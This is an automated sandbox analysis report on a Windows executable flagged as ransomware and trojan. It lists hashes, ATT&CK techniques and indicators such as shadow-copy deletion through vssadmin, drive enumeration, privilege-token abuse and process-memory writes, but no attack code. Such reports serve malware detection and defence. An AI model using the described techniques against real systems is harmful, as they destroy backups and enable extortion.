cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b

Analysis

max time kernel
66s
max time network
99s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
12/02/2024, 03:53

Sharing

Copy URL Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Size

4.8MB
MD5

9803950281290044e32fb78605c129b5
SHA1

133f587df70680d81c18d8c112b9a34e6041d629
SHA256

cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b
SHA512

b5be7c8710a6dfea3fafc85cd10881c62be587607be8f05a61f9bf6aa88456c8c1dd694c85dd5707cd5518bb2f87f077824e410c24f081fab30ea13572de3c21
SSDEEP

98304:pWFsTuRN2zazBLlLvOc1Pgd1E20fzsFvOF3BQQi4y0g1ea6:pWFsTuRN2zahf1Y7EhZSlI

Score

9^/10

evasion ransomware trojan

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MSI56DC.tmp

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\L:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\Q:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\M:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\O:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\T:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\G:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\R:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\V:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\X:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\Z:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\E:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\N:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\B:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\U:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\W:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\K:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\P:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\S:	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
File opened (read-only)	\??\S:	msiexec.exe

Drops file in System32 directory 32 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	chcp.com
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	chcp.com
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 26 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI4EFB.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA000.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC203.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID9AA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFDFF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI21E7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4DD2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI519C.tmp	msiexec.exe
File created	C:\Windows\Installer\f764c20.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI56DC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB2F5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2ABE.tmp	msiexec.exe
File created	C:\Windows\Installer\f764c1d.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI56CB.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF1EE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE204.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE965.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI56EC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f764c1d.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE17.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5015.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI798A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9094.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICBA5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1864.tmp	msiexec.exe

Executes dropped EXE 1 IoCs

pid	Process
1088	MSI56DC.tmp

Loads dropped DLL 22 IoCs

pid	Process
2756	MsiExec.exe
2756	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe
2736	MsiExec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1320	timeout.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
1492	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 33 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000429d3af34477a14f8b2dd7691733418900000000020000000000106600000001000020000000ce832c29053bff9736bbc199fa50d2bf385103621241cb3bf2fc2d9bcb525ff8000000000e8000000002000020000000819c91b19fa2cd6057ae4c7eef13045c54ace5e67d257a10a2d83f450700845920000000c187594b9649b5f8e933151ff0f5eab12baca967f046eb19066b5142e4bd109540000000d05652212f3dfc2876260a5dfce23488ebc91f023cf2291c89e9dddcc6016ab8cff95648b72b3d3f7b648c7f5f84d5aeace991d10814031a089946dc77c0c5f5	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000429d3af34477a14f8b2dd76917334189000000000200000000001066000000010000200000003d137eea311b0d071b779080579e0b781300590cde1c4284314917c49289b2d9000000000e80000000020000200000000b435c2fcdccb87b3aa655eb3fd5ffe44fe85c13f3e77dcd3f33917fb4c9ab3290000000bf3defd601652c00c896bf41b4fbbb1bf4a04c77bd4817b3acb57c807c0b04f8eafa668dfb339ca8db791d1fc106322fdd9208a8caf5c222be071e691e99d4d9e0a6654db1628f6589291b69a0ead3bdde105246bd45cc27a6c9d914ed3eca5ea49d7d5671170ee7050a99fe8d5a79051fc7a6f3d63d6fb95a587ea7ef031b741073bf9532b399de990a794997b74b1b4000000026f655eca75eaf1156ac9697d07935292affac09b5b3dc8226ef27749689ab7fad6184ab4b1681dc1490e2230f7ea3bfc8d7aabfda8dbeebdaa0a6375e8ea594	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3D9DDAE1-C964-11EE-8809-CE253106968E} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30c5371e715dda01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
2412	msiexec.exe
2412	msiexec.exe
2924	powershell.exe
2668	powershell.exe
388	powershell.exe
2588	powershell.exe
1836	powershell.exe
2592	powershell.exe
1764	powershell.exe
2608	powershell.exe
2664	powershell.exe
1480	chcp.com
1168	powershell.exe
2892	powershell.exe
2364	powershell.exe
1304	powershell.exe
2508	powershell.exe
2580	powershell.exe
2628	powershell.exe
1208	powershell.exe
2064	powershell.exe
1384	powershell.exe
2916	powershell.exe
568	powershell.exe
332	powershell.exe
2740	powershell.exe
948	powershell.exe
868	chcp.com
1972	powershell.exe
1756	powershell.exe
1648	powershell.exe
2304	powershell.exe
2276	powershell.exe
2644	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2412	msiexec.exe
Token: SeTakeOwnershipPrivilege	2412	msiexec.exe
Token: SeSecurityPrivilege	2412	msiexec.exe
Token: SeCreateTokenPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeAssignPrimaryTokenPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeLockMemoryPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeIncreaseQuotaPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeMachineAccountPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeTcbPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSecurityPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeTakeOwnershipPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeLoadDriverPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSystemProfilePrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSystemtimePrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeProfSingleProcessPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeIncBasePriorityPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeCreatePagefilePrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeCreatePermanentPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeBackupPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeRestorePrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeShutdownPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeDebugPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeAuditPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSystemEnvironmentPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeChangeNotifyPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeRemoteShutdownPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeUndockPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSyncAgentPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeEnableDelegationPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeManageVolumePrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeImpersonatePrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeCreateGlobalPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeCreateTokenPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeAssignPrimaryTokenPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeLockMemoryPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeIncreaseQuotaPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeMachineAccountPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeTcbPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSecurityPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeTakeOwnershipPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeLoadDriverPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSystemProfilePrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSystemtimePrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeProfSingleProcessPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeIncBasePriorityPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeCreatePagefilePrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeCreatePermanentPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeBackupPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeRestorePrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeShutdownPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeDebugPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeAuditPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSystemEnvironmentPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeChangeNotifyPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeRemoteShutdownPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeUndockPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeSyncAgentPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeEnableDelegationPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeManageVolumePrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeImpersonatePrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeCreateGlobalPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeCreateTokenPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeAssignPrimaryTokenPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
Token: SeLockMemoryPrivilege	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
2636	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2636	iexplore.exe
2636	iexplore.exe
1572	IEXPLORE.EXE
1572	IEXPLORE.EXE
1572	IEXPLORE.EXE
1572	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2412 wrote to memory of 2756	2412	msiexec.exe	29
PID 2412 wrote to memory of 2756	2412	msiexec.exe	29
PID 2412 wrote to memory of 2756	2412	msiexec.exe	29
PID 2412 wrote to memory of 2756	2412	msiexec.exe	29
PID 2412 wrote to memory of 2756	2412	msiexec.exe	29
PID 2412 wrote to memory of 2756	2412	msiexec.exe	29
